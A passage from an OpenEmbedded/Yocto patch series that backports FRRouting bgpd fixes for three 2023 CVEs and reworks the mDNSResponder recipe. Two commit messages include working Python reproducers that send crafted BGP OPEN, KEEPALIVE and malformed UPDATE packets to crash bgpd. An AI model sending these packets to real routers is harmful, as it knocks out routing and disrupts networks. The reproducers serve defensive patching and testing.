/usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597] +BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3] +BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0] +BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979] +``` + +Sending: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(1000) +s.close() +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-46753 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/d8482bf011cb2b173e85b65b4bf3d5061250cdb9] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 10 ++++++---- + 1 file changed, 6 insertions(+), 4 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index e0542356c..35122943e 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3044,13 +3044,15 @@ static bgp_attr_parse_ret_t bgp_attr_unknown(struct bgp_attr_parser_args *args) + } + + /* Well-known attribute check. */ +-static int bgp_attr_check(struct peer *peer, struct attr *attr) ++static int bgp_attr_check(struct peer *peer, struct attr *attr, ++ bgp_size_t length) + { + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an + * empty UPDATE. */ +- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag) ++ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && ++ !length) + return BGP_ATTR_PARSE_PROCEED; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +@@ -3101,7 +3103,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, + bgp_attr_parse_ret_t ret; + uint8_t flag = 0; + uint8_t type = 0; +- bgp_size_t length; ++ bgp_size_t length = 0; + uint8_t *startp, *endp; + uint8_t *attr_endp; + uint8_t seen[BGP_ATTR_BITMAP_SIZE]; +@@ -3416,7 +3418,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, + } + + /* Check all mandatory well-known attributes are present */ +- ret = bgp_attr_check(peer, attr); ++ ret = bgp_attr_check(peer, attr, length); + if (ret < 0) + goto done; + +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch new file mode 100644 index 0000000000..9bf63372a4 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch @@ -0,0 +1,98 @@ +From 682f100cd8d1bf7510939faa033f69ce64f965e9 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 20 Nov 2023 14:32:38 +0000 +Subject: [PATCH 5/6] bgpd: Ignore handling NLRIs if we received + MP_UNREACH_NLRI + +If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if +no mandatory path attributes received. + +In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled +as a new data, but without mandatory attributes, it's a malformed packet. + +In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST +handle that. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-47234 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/c37119df45bbf4ef713bc10475af2ee06e12f3bf] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 19 ++++++++++--------- + bgpd/bgp_attr.h | 1 + + bgpd/bgp_packet.c | 7 ++++++- + 3 files changed, 17 insertions(+), 10 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 35122943e..13da27e99 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3055,15 +3055,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + !length) + return BGP_ATTR_PARSE_PROCEED; + +- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +- are present, it should. Check for any other attribute being present +- instead. +- */ +- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && +- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))) +- return BGP_ATTR_PARSE_PROCEED; +- + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) + type = BGP_ATTR_ORIGIN; + +@@ -3082,6 +3073,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF))) + type = BGP_ATTR_LOCAL_PREF; + ++ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required ++ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI ++ * are present, it should. Check for any other attribute being present ++ * instead. ++ */ ++ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && ++ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))) ++ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY ++ : BGP_ATTR_PARSE_PROCEED; ++ + /* If any of the well-known mandatory attributes are not present + * in an UPDATE message, then "treat-as-withdraw" MUST be used. + */ +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 69f962134..77640dd5b 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -378,6 +378,7 @@ typedef enum { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, ++ BGP_ATTR_PARSE_MISSING_MANDATORY = -4, + } bgp_attr_parse_ret_t; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 261695198..c1c28f344 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1767,7 +1767,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + /* Network Layer Reachability Information. */ + update_len = end - stream_pnt(s); + +- if (update_len && attribute_len) { ++ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then ++ * NLRIs should be handled as a new data. Though, if we received ++ * NLRIs without mandatory attributes, they should be ignored. ++ */ ++ if (update_len && attribute_len && ++ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch new file mode 100644 index 0000000000..218dcba510 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch @@ -0,0 +1,114 @@ +From 024bdfcdf1d52db3a74f00a3370c3834a4bb78d0 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 20 Nov 2023 14:39:33 +0000 +Subject: [PATCH 6/6] bgpd: Treat EOR as withdrawn to avoid unwanted handling + of malformed attrs + +Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be +processed as a normal UPDATE without mandatory attributes, that could lead +to harmful behavior. In this case, a crash for route-maps with the configuration +such as: + +``` +router bgp 65001 + no bgp ebgp-requires-policy + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + ! + address-family ipv4 unicast + neighbor 127.0.0.1 addpath-tx-all-paths + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +exit +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Send a malformed optional transitive attribute: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(100) +s.close() +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-47235 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/6814f2e0138a6ea5e1f83bdd9085d9a77999900b] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 15 ++++++++++++--- + 1 file changed, 12 insertions(+), 3 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 13da27e99..1e08a218e 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3050,10 +3050,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an +- * empty UPDATE. */ ++ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it, ++ * we will pass it to be processed as a normal UPDATE without mandatory ++ * attributes, that could lead to harmful behavior. ++ */ + if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && + !length) +- return BGP_ATTR_PARSE_PROCEED; ++ return BGP_ATTR_PARSE_WITHDRAW; + + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) + type = BGP_ATTR_ORIGIN; +@@ -3477,7 +3480,13 @@ done: + } + + transit = bgp_attr_get_transit(attr); +- if (ret != BGP_ATTR_PARSE_ERROR) { ++ /* If we received an UPDATE with mandatory attributes, then ++ * the unrecognized transitive optional attribute of that ++ * path MUST be passed. Otherwise, it's an error, and from ++ * security perspective it might be very harmful if we continue ++ * here with the unrecognized attributes. ++ */ ++ if (ret == BGP_ATTR_PARSE_PROCEED) { + /* Finally intern unknown attribute. */ + if (transit) + bgp_attr_set_transit(attr, transit_intern(transit)); +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/frr.pam b/meta-networking/recipes-protocols/frr/frr/frr.pam index 3541a975ae..a9ec35dd69 100644 --- a/meta-networking/recipes-protocols/frr/frr/frr.pam +++ b/meta-networking/recipes-protocols/frr/frr/frr.pam @@ -1,10 +1,11 @@ # -# The PAM configuration file for the quagga `vtysh' service +# The PAM configuration file for the frr `vtysh' service # # This allows root to change user infomation without being # prompted for a password auth sufficient pam_rootok.so +account sufficient pam_rootok.so # The standard Unix authentication modules, used with # NIS (man nsswitch) as well as normal /etc/passwd and diff --git a/meta-networking/recipes-protocols/frr/frr_8.2.2.bb b/meta-networking/recipes-protocols/frr/frr_8.2.2.bb index 658731567d..03b106131f 100644 --- a/meta-networking/recipes-protocols/frr/frr_8.2.2.bb +++ b/meta-networking/recipes-protocols/frr/frr_8.2.2.bb @@ -12,6 +12,21 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ SRC_URI = "git://github.com/FRRouting/frr.git;protocol=https;branch=stable/8.2 \ file://CVE-2022-37035.patch \ file://CVE-2022-37032.patch \ + file://CVE-2022-42917.patch \ + file://CVE-2022-36440.patch \ + file://CVE-2022-40318.patch \ + file://CVE-2022-43681.patch \ + file://CVE-2023-31489.patch \ + file://CVE-2023-31490.patch \ + file://CVE-2023-38802.patch \ + file://CVE-2023-41358.patch \ + file://CVE-2023-41909.patch \ + file://CVE-2023-38406.patch \ + file://CVE-2023-38407.patch \ + file://CVE-2023-46752.patch \ + file://CVE-2023-46753.patch \ + file://CVE-2023-47234.patch \ + file://CVE-2023-47235.patch \ file://frr.pam \ " diff --git a/meta-networking/recipes-protocols/mdns/files/0001-Create-subroutine-for-cleaning-recent-interfaces.patch b/meta-networking/recipes-protocols/mdns/mdns/0001-Create-subroutine-for-cleaning-recent-interfaces.patch index f8efc10448..f8efc10448 100644 --- a/meta-networking/recipes-protocols/mdns/files/0001-Create-subroutine-for-cleaning-recent-interfaces.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0001-Create-subroutine-for-cleaning-recent-interfaces.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0001-dns-sd-Include-missing-headers.patch b/meta-networking/recipes-protocols/mdns/mdns/0001-dns-sd-Include-missing-headers.patch index c743b3eddb..c743b3eddb 100644 --- a/meta-networking/recipes-protocols/mdns/files/0001-dns-sd-Include-missing-headers.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0001-dns-sd-Include-missing-headers.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0001-mdns-include-stddef.h-for-NULL.patch b/meta-networking/recipes-protocols/mdns/mdns/0001-mdns-include-stddef.h-for-NULL.patch index c57ce8fa53..c57ce8fa53 100644 --- a/meta-networking/recipes-protocols/mdns/files/0001-mdns-include-stddef.h-for-NULL.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0001-mdns-include-stddef.h-for-NULL.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0002-Create-subroutine-for-tearing-down-an-interface.patch b/meta-networking/recipes-protocols/mdns/mdns/0002-Create-subroutine-for-tearing-down-an-interface.patch index 21ba318499..21ba318499 100644 --- a/meta-networking/recipes-protocols/mdns/files/0002-Create-subroutine-for-tearing-down-an-interface.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0002-Create-subroutine-for-tearing-down-an-interface.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0002-mdns-cross-compilation-fixes-for-bitbake.patch b/meta-networking/recipes-protocols/mdns/mdns/0002-mdns-cross-compilation-fixes-for-bitbake.patch index 33590ffc57..33590ffc57 100644 --- a/meta-networking/recipes-protocols/mdns/files/0002-mdns-cross-compilation-fixes-for-bitbake.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0002-mdns-cross-compilation-fixes-for-bitbake.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0003-Track-interface-socket-family.patch b/meta-networking/recipes-protocols/mdns/mdns/0003-Track-interface-socket-family.patch index 8c0e6bf397..8c0e6bf397 100644 --- a/meta-networking/recipes-protocols/mdns/files/0003-Track-interface-socket-family.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0003-Track-interface-socket-family.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0004-Use-list-for-changed-interfaces.patch b/meta-networking/recipes-protocols/mdns/mdns/0004-Use-list-for-changed-interfaces.patch index db3a63ea48..db3a63ea48 100644 --- a/meta-networking/recipes-protocols/mdns/files/0004-Use-list-for-changed-interfaces.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0004-Use-list-for-changed-interfaces.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0006-Remove-unneeded-function.patch b/meta-networking/recipes-protocols/mdns/mdns/0006-Remove-unneeded-function.patch index b461a60df7..b461a60df7 100644 --- a/meta-networking/recipes-protocols/mdns/files/0006-Remove-unneeded-function.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0006-Remove-unneeded-function.patch diff --git a/meta-networking/recipes-protocols/mdns/mdns/0006-make-Add-top-level-Makefile.patch b/meta-networking/recipes-protocols/mdns/mdns/0006-make-Add-top-level-Makefile.patch new file mode 100644 index 0000000000..b7d9ad5bba --- /dev/null +++ b/meta-networking/recipes-protocols/mdns/mdns/0006-make-Add-top-level-Makefile.patch @@ -0,0 +1,175 @@ +From 177abf68e5ac5f82c6261af63528f8b6160bca0f Mon Sep 17 00:00:00 2001 +From: Alex Kiernan <alex.kiernan@gmail.com> +Date: Tue, 6 Dec 2022 13:28:31 +0000 +Subject: [PATCH] make: Add top-level Makefile + +Simple top level Makefile that just delegates to mDNSPosix. + +Upstream-Status: Inappropriate [oe-specific] +Signed-off-by: Alex Kiernan <alex.kiernan@gmail.com> +--- + Makefile | 154 +------------------------------------------------------ + 1 file changed, 2 insertions(+), 152 deletions(-) + +diff --git a/Makefile b/Makefile +index 8b6fa77..feb6ac6 100644 +--- a/Makefile ++++ b/Makefile +@@ -1,152 +1,2 @@ +-# +-# Copyright (c) 2003-2018 Apple Inc. All rights reserved. +-# +-# Top level makefile for Build & Integration (B&I). +-# +-# This file is used to facilitate checking the mDNSResponder project directly from git and submitting to B&I at Apple. +-# +-# The various platform directories contain makefiles or projects specific to that platform. +-# +-# B&I builds must respect the following target: +-# install: +-# installsrc: +-# installhdrs: +-# installapi: +-# clean: +-# +- +-include $(MAKEFILEPATH)/pb_makefiles/platform.make +- +-MVERS = "mDNSResponder-1310.140.1" +- +-VER = +-ifneq ($(strip $(GCC_VERSION)),) +- VER = -- GCC_VERSION=$(GCC_VERSION) +-endif +-echo "VER = $(VER)" +- +-projectdir := $(SRCROOT)/mDNSMacOSX +-buildsettings := OBJROOT=$(OBJROOT) SYMROOT=$(SYMROOT) DSTROOT=$(DSTROOT) MVERS=$(MVERS) SDKROOT=$(SDKROOT) +- +-.PHONY: install installSome installEmpty installExtras SystemLibraries installhdrs installapi installsrc java clean +- +-# Sanitizer support +-# Disable Sanitizer instrumentation in LibSystem contributors. See rdar://problem/29952210. +-UNSUPPORTED_SANITIZER_PROJECTS := mDNSResponderSystemLibraries mDNSResponderSystemLibraries_Sim +-PROJECT_SUPPORTS_SANITIZERS := 1 +-ifneq ($(words $(filter $(UNSUPPORTED_SANITIZER_PROJECTS), $(RC_ProjectName))), 0) +- PROJECT_SUPPORTS_SANITIZERS := 0 +-endif +-ifeq ($(RC_ENABLE_ADDRESS_SANITIZATION),1) +- ifeq ($(PROJECT_SUPPORTS_SANITIZERS),1) +- $(info Enabling Address Sanitizer) +- buildsettings += -enableAddressSanitizer YES +- else +- $(warning WARNING: Address Sanitizer not supported for project $(RC_ProjectName)) +- endif +-endif +-ifeq ($(RC_ENABLE_THREAD_SANITIZATION),1) +- ifeq ($(PROJECT_SUPPORTS_SANITIZERS),1) +- $(info Enabling Thread Sanitizer) +- buildsettings += -enableThreadSanitizer YES +- else +- $(warning WARNING: Thread Sanitizer not supported for project $(RC_ProjectName)) +- endif +-endif +-ifeq ($(RC_ENABLE_UNDEFINED_BEHAVIOR_SANITIZATION),1) +- ifeq ($(PROJECT_SUPPORTS_SANITIZERS),1) +- $(info Enabling Undefined Behavior Sanitizer) +- buildsettings += -enableUndefinedBehaviorSanitizer YES +- else +- $(warning WARNING: Undefined Behavior Sanitizer not supported for project $(RC_ProjectName)) +- endif +-endif +- +-# B&I install build targets +-# +-# For the mDNSResponder build alias, the make target used by B&I depends on the platform: +-# +-# Platform Make Target +-# -------- ----------- +-# osx install +-# ios installSome +-# atv installSome +-# watch installSome +-# +-# For the mDNSResponderSystemLibraries and mDNSResponderSystemLibraries_sim build aliases, B&I uses the SystemLibraries +-# target for all platforms. +- +-install: +-ifeq ($(RC_ProjectName), mDNSResponderServices) +-ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), osx) +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Services-macOS' $(VER) +-else +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Services' $(VER) +-endif +-else ifeq ($(RC_ProjectName), mDNSResponderServices_Sim) +- mkdir -p $(DSTROOT)/AppleInternal +-else +- cd '$(projectdir)'; xcodebuild install $(buildsettings) $(VER) +-endif +- +-installSome: +- cd '$(projectdir)'; xcodebuild install $(buildsettings) $(VER) +- +-installEmpty: +- mkdir -p $(DSTROOT)/AppleInternal +- +-installExtras: +-ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), osx) +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Extras-macOS' $(VER) +-else ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), ios) +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Extras-iOS' $(VER) +-else ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), atv) +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Extras-tvOS' $(VER) +-else +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Extras' $(VER) +-endif +- +-SystemLibraries: +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target SystemLibraries $(VER) +- +-# B&I installhdrs build targets +- +-installhdrs:: +-ifeq ($(RC_ProjectName), mDNSResponderServices) +-ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), osx) +- cd '$(projectdir)'; xcodebuild installhdrs $(buildsettings) -target 'Build Services-macOS' $(VER) +-else +- cd '$(projectdir)'; xcodebuild installhdrs $(buildsettings) -target 'Build Services' $(VER) +-endif +-else ifeq ($(RC_ProjectName), mDNSResponderServices_Sim) +- mkdir -p $(DSTROOT)/AppleInternal +-else ifneq ($(findstring SystemLibraries,$(RC_ProjectName)),) +- cd '$(projectdir)'; xcodebuild installhdrs $(buildsettings) -target SystemLibraries $(VER) +-endif +- +-# B&I installapi build targets +- +-installapi: +-ifeq ($(RC_ProjectName), mDNSResponderServices) +-ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), osx) +- cd '$(projectdir)'; xcodebuild installapi $(buildsettings) -target 'Build Services-macOS' $(VER) +-else +- cd '$(projectdir)'; xcodebuild installapi $(buildsettings) -target 'Build Services' $(VER) +-endif +-else ifeq ($(RC_ProjectName), mDNSResponderServices_Sim) +- mkdir -p $(DSTROOT)/AppleInternal +-else ifneq ($(findstring SystemLibraries,$(RC_ProjectName)),) +- cd '$(projectdir)'; xcodebuild installapi $(buildsettings) -target SystemLibrariesDynamic $(VER) +-endif +- +-# Misc. targets +- +-installsrc: +- ditto . '$(SRCROOT)' +- rm -rf '$(SRCROOT)/mDNSWindows' '$(SRCROOT)/Clients/FirefoxExtension' +- +-java: +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target libjdns_sd.jnilib $(VER) +- +-clean:: +- echo clean ++all clean: ++ cd mDNSPosix && $(MAKE) $@ +-- +2.38.1 + diff --git a/meta-networking/recipes-protocols/mdns/files/0008-Mark-deleted-interfaces-as-being-changed.patch b/meta-networking/recipes-protocols/mdns/mdns/0008-Mark-deleted-interfaces-as-being-changed.patch index fdc5105cb9..fdc5105cb9 100644 --- a/meta-networking/recipes-protocols/mdns/files/0008-Mark-deleted-interfaces-as-being-changed.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0008-Mark-deleted-interfaces-as-being-changed.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0009-Fix-possible-NULL-dereference.patch b/meta-networking/recipes-protocols/mdns/mdns/0009-Fix-possible-NULL-dereference.patch index 362d69768e..362d69768e 100644 --- a/meta-networking/recipes-protocols/mdns/files/0009-Fix-possible-NULL-dereference.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0009-Fix-possible-NULL-dereference.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0010-Handle-errors-from-socket-calls.patch b/meta-networking/recipes-protocols/mdns/mdns/0010-Handle-errors-from-socket-calls.patch index b9b0157276..b9b0157276 100644 --- a/meta-networking/recipes-protocols/mdns/files/0010-Handle-errors-from-socket-calls.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0010-Handle-errors-from-socket-calls.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0011-Change-a-dynamic-allocation-to-file-scope-variable.patch b/meta-networking/recipes-protocols/mdns/mdns/0011-Change-a-dynamic-allocation-to-file-scope-variable.patch index d9adde04c2..d9adde04c2 100644 --- a/meta-networking/recipes-protocols/mdns/files/0011-Change-a-dynamic-allocation-to-file-scope-variable.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0011-Change-a-dynamic-allocation-to-file-scope-variable.patch diff --git a/meta-networking/recipes-protocols/mdns/files/mdns.service b/meta-networking/recipes-protocols/mdns/mdns/mdns.service index 531d142dcd..531d142dcd 100644 --- a/meta-networking/recipes-protocols/mdns/files/mdns.service +++ b/meta-networking/recipes-protocols/mdns/mdns/mdns.service diff --git a/meta-networking/recipes-protocols/mdns/mdns_1310.140.1.bb b/meta-networking/recipes-protocols/mdns/mdns_1310.140.1.bb index 205dc929be..65f4847d8f 100644 --- a/meta-networking/recipes-protocols/mdns/mdns_1310.140.1.bb +++ b/meta-networking/recipes-protocols/mdns/mdns_1310.140.1.bb @@ -2,28 +2,31 @@ SUMMARY = "Publishes & browses available services on a link according to the Zer DESCRIPTION = "Bonjour, also known as zero-configuration networking, enables automatic discovery of computers, devices, and services on IP networks." HOMEPAGE = "http://developer.apple.com/networking/bonjour/" LICENSE = "Apache-2.0 & BSD-3-Clause" -LIC_FILES_CHKSUM = "file://../LICENSE;md5=31c50371921e0fb731003bbc665f29bf" +LIC_FILES_CHKSUM = "file://LICENSE;md5=31c50371921e0fb731003bbc665f29bf" DEPENDS:append:libc-musl = " musl-nscd" RPROVIDES:${PN} += "libdns_sd.so" -SRC_URI = "https://opensource.apple.com/tarballs/mDNSResponder/mDNSResponder-${PV}.tar.gz \ +# matches annotated tag mDNSResponder-1310.140.1 +SRCREV = "1d1de95b98fba2077d34c9d78b839a96aa0e1c77" +BRANCH = "rel/mDNSResponder-1310" +SRC_URI = "git://github.com/apple-oss-distributions/mDNSResponder;protocol=https;branch=${BRANCH} \ file://mdns.service \ - file://0001-mdns-include-stddef.h-for-NULL.patch;patchdir=.. \ - file://0002-mdns-cross-compilation-fixes-for-bitbake.patch;patchdir=.. \ - file://0001-Create-subroutine-for-cleaning-recent-interfaces.patch;patchdir=.. \ - file://0002-Create-subroutine-for-tearing-down-an-interface.patch;patchdir=.. \ - file://0003-Track-interface-socket-family.patch;patchdir=.. \ - file://0004-Use-list-for-changed-interfaces.patch;patchdir=.. \ - file://0006-Remove-unneeded-function.patch;patchdir=.. \ - file://0008-Mark-deleted-interfaces-as-being-changed.patch;patchdir=.. \ - file://0009-Fix-possible-NULL-dereference.patch;patchdir=.. \ - file://0010-Handle-errors-from-socket-calls.patch;patchdir=.. \ - file://0011-Change-a-dynamic-allocation-to-file-scope-variable.patch;patchdir=.. \ - file://0001-dns-sd-Include-missing-headers.patch;patchdir=.. \ + file://0001-mdns-include-stddef.h-for-NULL.patch \ + file://0002-mdns-cross-compilation-fixes-for-bitbake.patch \ + file://0001-Create-subroutine-for-cleaning-recent-interfaces.patch \ + file://0002-Create-subroutine-for-tearing-down-an-interface.patch \ + file://0003-Track-interface-socket-family.patch \ + file://0004-Use-list-for-changed-interfaces.patch \ + file://0006-Remove-unneeded-function.patch \ + file://0008-Mark-deleted-interfaces-as-being-changed.patch \ + file://0009-Fix-possible-NULL-dereference.patch \ + file://0010-Handle-errors-from-socket-calls.patch \ + file://0011-Change-a-dynamic-allocation-to-file-scope-variable.patch \ + file://0001-dns-sd-Include-missing-headers.patch \ + file://0006-make-Add-top-level-Makefile.patch \ " -SRC_URI[sha256sum] = "040f6495c18b9f0557bcf9e00cbcfc82b03405f5ba6963dc147730ca0ca90d6f" CVE_PRODUCT = "apple:mdnsresponder" @@ -42,13 +45,22 @@ CVE_CHECK_IGNORE += "CVE-2007-0613" PARALLEL_MAKE = "" -S = "${WORKDIR}/mDNSResponder-${PV}/mDNSPosix" +# We install a stub Makefile in the top directory so that the various checks +# in base.bbclass pass their tests for a Makefile, this ensures (that 